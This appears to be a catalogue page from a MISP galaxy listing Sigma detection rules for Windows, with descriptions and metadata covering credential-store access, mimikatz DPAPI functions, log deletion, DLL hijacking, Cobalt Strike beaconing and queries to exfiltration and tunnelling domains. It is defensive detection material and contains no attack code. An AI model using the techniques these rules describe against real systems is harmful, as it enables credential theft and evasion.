logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

QuarksPwDump Dump File

Detects a dump file written by QuarksPwDump password dumper

Internal MISP references

UUID 847def9e-924d-4e90-b7c4-5f581395a2b4 which can be used as unique global reference for QuarksPwDump Dump File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/02/10
falsepositive ['Unknown']
filename file_event_win_hktl_quarkspw_filedump.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Powerup Write Hijack DLL

Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).

Internal MISP references

UUID 602a1f13-c640-4d73-b053-be9a2fa58b96 which can be used as unique global reference for Powerup Write Hijack DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Subhash Popuri (@pbssubhash)
creation_date 2021/08/21
falsepositive ['Any powershell script that creates bat files']
filename file_event_win_hktl_powerup_dllhijacking.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Creation Of Non-Existent System DLL

Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.

Internal MISP references

UUID df6ecb8b-7822-4f4b-b412-08f524b4576c which can be used as unique global reference for Creation Of Non-Existent System DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), fornotes
creation_date 2022/12/01
falsepositive ['Unknown']
filename file_event_win_create_non_existent_dlls.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Wmiprvse Wbemcomn DLL Hijack - File

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

Internal MISP references

UUID 614a7e17-5643-4d89-b6fe-f9df1a79641c which can be used as unique global reference for Wmiprvse Wbemcomn DLL Hijack - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/12
falsepositive ['Unknown']
filename file_event_win_wmiprvse_wbemcomn_dll_hijack.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

PowerShell Module File Created By Non-PowerShell Process

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process

Internal MISP references

UUID e3845023-ca9a-4024-b2b2-5422156d5527 which can be used as unique global reference for PowerShell Module File Created By Non-PowerShell Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['Unknown']
filename file_event_win_powershell_module_uncommon_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Windows Terminal Profile Settings Modification By Uncommon Process

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

Internal MISP references

UUID 9b64de98-9db3-4033-bd7a-f51430105f00 which can be used as unique global reference for Windows Terminal Profile Settings Modification By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/22
falsepositive ['Some false positives may occur with admin scripts that set WT settings.']
filename file_event_win_susp_windows_terminal_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.015']
Related clusters

To see the related clusters, click here.

DLL Search Order Hijackig Via Additional Space in Path

Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack

Internal MISP references

UUID b6f91281-20aa-446a-b986-38a92813a18f which can be used as unique global reference for DLL Search Order Hijackig Via Additional Space in Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/07/30
falsepositive ['Unknown']
filename file_event_win_dll_sideloading_space_path.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Write to System32 Tasks

Detects the creation of tasks from processes executed from suspicious locations

Internal MISP references

UUID 80e1f67a-4596-4351-98f5-a9c3efabac95 which can be used as unique global reference for Suspicious Scheduled Task Write to System32 Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/16
falsepositive ['Unknown']
filename file_event_win_susp_task_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.execution', 'attack.t1053']
Related clusters

To see the related clusters, click here.

Suspicious Appended Extension

Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.

Internal MISP references

UUID e3f673b3-65d1-4d80-9146-466f8b63fa99 which can be used as unique global reference for Suspicious Appended Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/16
falsepositive ['Backup software']
filename file_rename_win_ransomware.yml
level medium
logsource.category file_rename
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Self Extraction Directive File Created

Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.

Internal MISP references

UUID ab90dab8-c7da-4010-9193-563528cfa347 which can be used as unique global reference for Potentially Suspicious Self Extraction Directive File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/02/05
falsepositive ['Unknown']
filename file_executable_detected_win_susp_embeded_sed_file.yml
level medium
logsource.category file_executable_detected
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

IIS WebServer Access Logs Deleted

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 3eb8c339-a765-48cc-a150-4364c04652bf which can be used as unique global reference for IIS WebServer Access Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/16
falsepositive ['During uninstallation of the IIS service', 'During log rotation']
filename file_delete_win_delete_iis_access_logs.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

TeamViewer Log File Deleted

Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID b1decb61-ed83-4339-8e95-53ea51901720 which can be used as unique global reference for TeamViewer Log File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Unknown']
filename file_delete_win_delete_teamviewer_logs.yml
level low
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Potential PrintNightmare Exploitation Attempt

Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675

Internal MISP references

UUID 5b2bbc47-dead-4ef7-8908-0cf73fcbecbf which can be used as unique global reference for Potential PrintNightmare Exploitation Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/07/01
falsepositive ['Unknown']
filename file_delete_win_cve_2021_1675_print_nightmare.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574', 'cve.2021.1675']
Related clusters

To see the related clusters, click here.

Exchange PowerShell Cmdlet History Deleted

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID a55349d8-9588-4c5a-8e3b-1925fe2a4ffe which can be used as unique global reference for Exchange PowerShell Cmdlet History Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Possible FP during log rotation']
filename file_delete_win_delete_exchange_powershell_logs.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Backup Files Deleted

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

Internal MISP references

UUID 06125661-3814-4e03-bfa2-1e4411c60ac3 which can be used as unique global reference for Backup Files Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/02
falsepositive ['Legitime usage']
filename file_delete_win_delete_backup_file.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

EventLog EVTX File Deleted

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 63c779ba-f638-40a0-a593-ddd45e8b1ddc which can be used as unique global reference for EventLog EVTX File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename file_delete_win_delete_event_log_files.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

File Deleted Via Sysinternals SDelete

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

Internal MISP references

UUID 6ddab845-b1b8-49c2-bbf7-1a11967f64bc which can be used as unique global reference for File Deleted Via Sysinternals SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Legitime usage of SDelete']
filename file_delete_win_sysinternals_sdelete_file_deletion.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Tomcat WebServer Logs Deleted

Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 270185ff-5f50-4d6d-a27f-24c3b8c9fef8 which can be used as unique global reference for Tomcat WebServer Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/16
falsepositive ['During uninstallation of the tomcat server', 'During log rotation']
filename file_delete_win_delete_tomcat_logs.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Prefetch File Deleted

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 0a1f9d29-6465-4776-b091-7f43b26e4c89 which can be used as unique global reference for Prefetch File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric MAURUGEON
creation_date 2021/09/29
falsepositive ['Unknown']
filename file_delete_win_delete_prefetch.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

PowerShell Console History Logs Deleted

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID ff301988-c231-4bd0-834c-ac9d73b86586 which can be used as unique global reference for PowerShell Console History Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename file_delete_win_delete_powershell_command_history.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

ADS Zone.Identifier Deleted By Uncommon Application

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

Internal MISP references

UUID 3109530e-ab47-4cc6-a953-cac5ebcc93ae which can be used as unique global reference for ADS Zone.Identifier Deleted By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/04
falsepositive ['Other third party applications not listed.']
filename file_delete_win_zone_identifier_ads_uncommon.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Unusual File Deletion by Dns.exe

Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 which can be used as unique global reference for Unusual File Deletion by Dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename file_delete_win_unusual_deletion_by_dns_exe.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Access To Potentially Sensitive Sysvol Files By Uncommon Application

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

Internal MISP references

UUID d51694fe-484a-46ac-92d6-969e76d60d10 which can be used as unique global reference for Access To Potentially Sensitive Sysvol Files By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/12/21
falsepositive ['Unknown']
filename file_access_win_susp_gpo_access_file.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Access To Browser Credential Files By Uncommon Application

Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage

Internal MISP references

UUID 91cb43db-302a-47e3-b3c8-7ede481e27bf which can be used as unique global reference for Access To Browser Credential Files By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/09
falsepositive ['Antivirus, Anti-Spyware, Anti-Malware Software', 'Backup software', 'Legitimate software installed on partitions other than "C:\"', 'Searching software such as "everything.exe"']
filename file_access_win_browser_credential_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.t1003', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Access To Windows DPAPI Master Keys By Uncommon Application

Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function

Internal MISP references

UUID 46612ae6-86be-4802-bc07-39b59feb1309 which can be used as unique global reference for Access To Windows DPAPI Master Keys By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Unknown']
filename file_access_win_dpapi_master_key_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Credential Manager Access By Uncommon Application

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function

Internal MISP references

UUID 407aecb1-e762-4acf-8c7b-d087bcff3bb6 which can be used as unique global reference for Credential Manager Access By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/11
falsepositive ['Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).']
filename file_access_win_credential_manager_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.t1003', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Access To Windows Credential History File By Uncommon Application

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function

Internal MISP references

UUID 7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2 which can be used as unique global reference for Access To Windows Credential History File By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Unknown']
filename file_access_win_susp_cred_hist_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Access To .Reg/.Hive Files By Uncommon Application

Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.

Internal MISP references

UUID 337a31c6-46c4-46be-886a-260d7aa78cac which can be used as unique global reference for Access To .Reg/.Hive Files By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/09/15
falsepositive ['Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.']
filename file_access_win_reg_and_hive_access.yml
level low
logsource.category file_access
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Unusual File Modification by dns.exe

Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 which can be used as unique global reference for Unusual File Modification by dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename file_change_win_unusual_modification_by_dns_exe.yml
level high
logsource.category file_change
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

File Creation Date Changed to Another Year

Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

Internal MISP references

UUID 558eebe5-f2ba-4104-b339-36f7902bcc1a which can be used as unique global reference for File Creation Date Changed to Another Year in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Changes made to or by the local NTP service']
filename file_change_win_2022_timestomping.yml
level high
logsource.category file_change
logsource.product windows
tags ['attack.t1070.006', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

DNS Query To Remote Access Software Domain From Non-Browser App

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 which can be used as unique global reference for DNS Query To Remote Access Software Domain From Non-Browser App in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Connor Martin
creation_date 2022/07/11
falsepositive ['Likely with other browser software. Apply additional filters for any other browsers you might use.']
filename dns_query_win_remote_access_software_domains_non_browsers.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

DNS HybridConnectionManager Service Bus

Detects Azure Hybrid Connection Manager services querying the Azure service bus service

Internal MISP references

UUID 7bd3902d-8b8b-4dd4-838a-c6862d40150d which can be used as unique global reference for DNS HybridConnectionManager Service Bus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service']
filename dns_query_win_hybridconnectionmgr_servicebus.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

Suspicious DNS Query for IP Lookup Service APIs

Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.

Internal MISP references

UUID ec82e2a5-81ea-4211-a1f8-37a0286df2c2 which can be used as unique global reference for Suspicious DNS Query for IP Lookup Service APIs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Brandon George (blog post), Thomas Patzke
creation_date 2021/07/08
falsepositive ['Legitimate usage of IP lookup services such as ipify API']
filename dns_query_win_susp_external_ip_lookup.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1590']
Related clusters

To see the related clusters, click here.

DNS Query To Visual Studio Code Tunnels Domain

Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID b3e6418f-7c7a-4fad-993a-93b65027a9f1 which can be used as unique global reference for DNS Query To Visual Studio Code Tunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author citron_ninja
creation_date 2023/10/25
falsepositive ['Legitimate use of Visual Studio Code tunnel will also trigger this.']
filename dns_query_win_vscode_tunnel_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

DNS Query for Anonfiles.com Domain - Sysmon

Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes

Internal MISP references

UUID 065cceea-77ec-4030-9052-fc0affea7110 which can be used as unique global reference for DNS Query for Anonfiles.com Domain - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/07/15
falsepositive ['Rare legitimate access to anonfiles.com']
filename dns_query_win_anonymfiles_com.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Server Discovery Via LDAP Query

Detects DNS server discovery via LDAP query requests from uncommon applications

Internal MISP references

UUID a21bcd7e-38ec-49ad-b69a-9ea17e69509e which can be used as unique global reference for DNS Server Discovery Via LDAP Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Likely']
filename dns_query_win_dns_server_discovery_via_ldap_query.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

TeamViewer Domain Query By Non-TeamViewer Application

Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)

Internal MISP references

UUID 778ba9a8-45e4-4b80-8e3e-34a419f0b85e which can be used as unique global reference for TeamViewer Domain Query By Non-TeamViewer Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/30
falsepositive ['Unknown binary names of TeamViewer', 'Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications']
filename dns_query_win_teamviewer_domain_query_by_uncommon_app.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

DNS Query To MEGA Hosting Website

Detects DNS queries for subdomains related to MEGA sharing website

Internal MISP references

UUID 613c03ba-0779-4a53-8a1f-47f914a4ded3 which can be used as unique global reference for DNS Query To MEGA Hosting Website in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021/05/26
falsepositive ['Legitimate DNS queries and usage of Mega']
filename dns_query_win_mega_nz.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query To Ufile.io

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

Internal MISP references

UUID 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b which can be used as unique global reference for DNS Query To Ufile.io in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author yatinwad, TheDFIRReport
creation_date 2022/06/23
falsepositive ['DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take']
filename dns_query_win_ufile_io_query.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Suspicious Cobalt Strike DNS Beaconing - Sysmon

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID f356a9c4-effd-4608-bbf8-408afd5cd006 which can be used as unique global reference for Suspicious Cobalt Strike DNS Beaconing - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/09
falsepositive ['Unknown']
filename dns_query_win_mal_cobaltstrike.yml
level critical
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

AppX Package Installation Attempts Via AppInstaller.EXE

Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL

Internal MISP references

UUID 7cff77e1-9663-46a3-8260-17f2e1aa9d0a which can be used as unique global reference for AppX Package Installation Attempts Via AppInstaller.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/24
falsepositive ['Unknown']
filename dns_query_win_appinstaller.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Detects DNS query requests to Cloudflared tunnels domains.

Internal MISP references

UUID a1d9eec5-33b2-4177-8d24-27fe754d0812 which can be used as unique global reference for Cloudflared Tunnels Related DNS Requests in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/20
falsepositive ['Legitimate use of cloudflare tunnels will also trigger this.']
filename dns_query_win_cloudflared_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

DNS Query Request By Regsvr32.EXE

Detects DNS queries initiated by "Regsvr32.exe"

Internal MISP references

UUID 36e037c4-c228-4866-b6a3-48eb292b9955 which can be used as unique global reference for DNS Query Request By Regsvr32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename dns_query_win_regsvr32_dns_query.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.execution', 'attack.t1559.001', 'attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

DNS Query Request To OneLaunch Update Service

Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.

Internal MISP references

UUID df68f791-ad95-447f-a271-640a0dab9cf8 which can be used as unique global reference for DNS Query Request To OneLaunch Update Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels
creation_date 2024/02/26
falsepositive ['Unlikely']
filename dns_query_win_onelaunch_update_service.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.collection', 'attack.t1056']
Related clusters

To see the related clusters, click here.

DNS Query Tor .Onion Address - Sysmon

Detects DNS queries to an ".onion" address related to Tor routing networks

Internal MISP references

UUID b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 which can be used as unique global reference for DNS Query Tor .Onion Address - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/20
falsepositive ['Unknown']
filename dns_query_win_tor_onion_domain_query.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

DNS Query To Devtunnels Domain

Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b which can be used as unique global reference for DNS Query To Devtunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author citron_ninja
creation_date 2023/10/25
falsepositive ['Legitimate use of Devtunnels will also trigger this.']
filename dns_query_win_devtunnels_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

New DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.

Internal MISP references

UUID 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 which can be used as unique global reference for New DLL Registered Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
